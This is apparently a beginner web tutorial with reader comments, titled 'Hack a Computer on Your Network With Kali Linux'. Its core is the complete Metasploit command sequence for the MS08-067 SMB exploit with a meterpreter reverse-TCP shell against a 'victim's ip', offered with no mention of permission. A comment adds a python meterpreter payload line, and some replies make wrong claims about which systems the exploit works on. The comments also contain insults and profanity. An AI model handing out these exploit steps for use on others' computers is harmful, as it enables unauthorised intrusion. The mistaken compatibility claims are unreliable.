Hack a Computer on Your Network With Kali Linux

542K9680

Intro: Hack a Computer on Your Network With Kali Linux

Hey guys!

So you want to hack a computer and you've got Kali linux installed?

Then you are on the right place!

I am going to show you how to hack a computer.

STEP 1: Start Kali Linux

Start Kali Linux and start a new terminal.

STEP 2: Start the Metasploit Console

Start the Metasploit console by typing: msfconsole

This will take a few moments...

STEP 3: The Commands:

So Metasploit started.

Here are the commands you need to type in:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(You should connect)

Type help for a list of commands.

STEP 4: That's It!

That's it!

You just hacked a computer!

Congrats!

I will probably make more tutorials about hacking and other ways to hack a computer.

So if this didn't work for you, stay tuned!

I think it only works for older versions of windows :(

Also please take a look at my Widows 7 hack tutorial!

>>>

https://www.instructables.com/id/Hack-Windows-7-or-Higher-With-SeToolkit

62 Comments

I used Kali Linux in raspberry pi 3 b+ model so is it good for use for a beginner like me.....and how can I install metasploit in SD card ???I booted the Linux in to SD card .so can I use it again to installe metasploit?????
Metasploit should be already installed in Kali Linux under normal circumstances
How to find victim's up address????please tell me......
To be fair mate, that's the thing. YOU have to figure it out otherwise hacking them is no bueno.
What you could do is use zenmap to list the IPs, then to ping it. rather not spoil the rest as it's more fun if you figure it out.
Everyone of you communists is accidentally helpful, or purposefully wasting valuable space-time in this reality. Could not give u a definitive answer to any rational reason why you could possibly still find the resolve every afternoon to slither off ur moms hideaway soda , demand she cook you an omellete, and scroll down to some poor unsuspectimg comment section u happened upon so as to leave behind your legacy- the comment section of a forums euivalent of a public bathrooms stall poetry and wall art. Keep it up
you know what you butthole? not all of us live in our parents basement as we are penetration testing and avoiding people like you getting malware so why dont you shut your fucking mouth you dick?
and also people like us actually get paid well with our fields instead of probably working at mcdonalds as a janitor, why dont you go back to what you do best, that is being a failure at life unlike us, who are actually making lives better and easier, we find backdoors so we can close them and make blackhats lives hell.

i am having this problem because i am a beginner

so please help me with it.

i am using linux without any virtualization ,and i can't install a single addional software on it.

Hey i just started and your problem is because you are not running kali linux as the man os on the computer. i was first running kali off a usb boot and it gave me the same thing

sudo apt install *gdeb1 or something*

Please get it that you are not root (admin..)

Hi there
I have some questions about this:-
1) Can this work with other ports.
2) After all the process it shows the message : exploit completed but no session was created. In this case what to do.
3) Is it only for windows or any other os
4) Can this work with windows 10 and ubuntu.
5) Can we use it outside our network

1) yes it can

2) that message means u got evreything right and you have to wait for the victim to open you're payload on their computer

3) it can work for mac, linux, windows, android, iso

4) yes

5) Im not sure on this one but when i researched it u need NAT and i believe u need portforwarding

hope this helped :)

please help me

installed linux just now.

i am getting bored on it.

it has no notepad nor photo editor etc

Linux is not a operating system to mess around with...It actually has nano..vim and pluma in MATE....and IN the photo the reason you are failing is besause you are not ADMIN (root....)

Hi!

I was looking for a good tutorial on basic hacking/pen testing on Kali Linux, and I came across this. I was a bit frustrated reading this, because you didn't explain what anything did. set LHOST, LPORT, RHOST, and RPORT is quite obvious, but I would like to know what all of these commands actually do. I want to learn from this, not just have it as a little gimmick I can use to brag to my friends about.

Greetz, Erik.

No you dumbass. You can well see that he used windows/meterpreter/reverse_tcp .-.

Yes it does you just need to change the payload to

python/meterpreter/reverse_tcp LHOST="localhost" LPORT="localport" > pyterpreter.py

So i guess your pretty stupid to answer a question wrong ;P

More Comments